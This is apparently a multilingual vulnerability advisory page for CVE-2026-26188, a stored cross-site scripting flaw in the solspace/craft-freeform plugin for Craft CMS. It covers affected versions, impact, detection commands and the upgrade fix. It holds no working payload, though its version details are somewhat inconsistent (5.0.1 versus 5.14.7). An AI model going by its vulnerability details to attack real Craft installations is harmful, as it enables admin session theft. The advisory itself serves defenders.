Plataforma
php
Componente
solspace/craft-freeform
Corrigido em
5.0.1
5.14.7
CVE-2026-26188 describes a Cross-Site Scripting (XSS) vulnerability within the solspace/craft-freeform plugin for Craft CMS. This vulnerability allows authenticated, low-privilege users—those capable of creating or editing forms—to inject arbitrary HTML and JavaScript code. The impact is primarily limited to the Craft CMS Control Panel (CP), specifically affecting admin users who view form builder and integration screens. The vulnerability affects versions of solspace/craft-freeform up to and including 5.9.9, with a fix available in version 5.14.7.
The vulnerability stems from the insecure rendering of user-controlled form labels and integration metadata using dangerouslySetInnerHTML without proper sanitization. An attacker can craft malicious form submissions containing JavaScript payloads. When an administrator views the form builder or integration screens in the Craft CP, this payload executes in their browser context. This can lead to various malicious actions, including session hijacking, credential theft, and defacement of the Craft CMS administration interface. The attacker's ability to inject arbitrary JavaScript grants them a significant level of control within the CP, potentially allowing them to compromise the entire Craft CMS installation if further exploits are chained.
CVE-2026-26188 was publicly disclosed on January 22, 2026. While no active exploitation campaigns have been publicly reported at the time of writing, the ease of exploitation and the potential impact make it a likely target for opportunistic attackers. The vulnerability is not currently listed on CISA KEV. Public proof-of-concept exploits are expected to emerge as the vulnerability gains wider awareness.
Organizations using Craft CMS with the solspace/craft-freeform plugin, particularly those with multiple administrators or users who have the ability to create and edit forms, are at risk. Shared hosting environments where multiple Craft CMS installations share the same server resources could also be affected if one installation is compromised.
• wordpress / composer / npm:
grep -r "dangerouslySetInnerHTML" /path/to/craft-freeform/• generic web:
curl -I https://your-craft-site.com/admin/actions/forms/builder | grep -i 'X-XSS-Protection'disclosure
Status do Exploit
EPSS
0.03% (percentil 10%)
CISA SSVC
The primary mitigation for CVE-2026-26188 is to immediately upgrade to solspace/craft-freeform version 5.14.7 or later. This version includes the necessary sanitization fixes to prevent the XSS vulnerability. If upgrading is not immediately feasible, consider restricting access to the form builder and integration screens to only trusted administrators. While not a complete solution, implementing a Web Application Firewall (WAF) with rules to detect and block suspicious HTML/JavaScript injection attempts can provide an additional layer of defense. Thoroughly review and sanitize all user-submitted data within your Craft CMS forms, even after upgrading, to ensure best practices are followed.
Actualice el plugin Solspace Freeform a la versión 5.14.7 o superior. Esta versión corrige la vulnerabilidad de Cross-Site Scripting (XSS) almacenado. La actualización se puede realizar a través del panel de control de Craft CMS.
Análise de vulnerabilidades e alertas críticos diretamente no seu e-mail.
CVE-2026-26188 is a Cross-Site Scripting (XSS) vulnerability in the solspace/craft-freeform plugin for Craft CMS, allowing authenticated users to inject malicious code into the admin panel.
You are affected if you are using solspace/craft-freeform version 5.9.9 or earlier. Check your plugin versions and upgrade immediately.
Upgrade to solspace/craft-freeform version 5.14.7 or later to patch the vulnerability. This resolves the insecure rendering of user-controlled data.
While no active exploitation campaigns have been publicly reported, the vulnerability's ease of exploitation makes it a potential target. Monitor your systems closely.
Refer to the solspace website and Craft CMS security advisories for the official announcement and details regarding this vulnerability.
Envie seu arquivo de dependências e descubra na hora se esta e outras CVEs te atingem.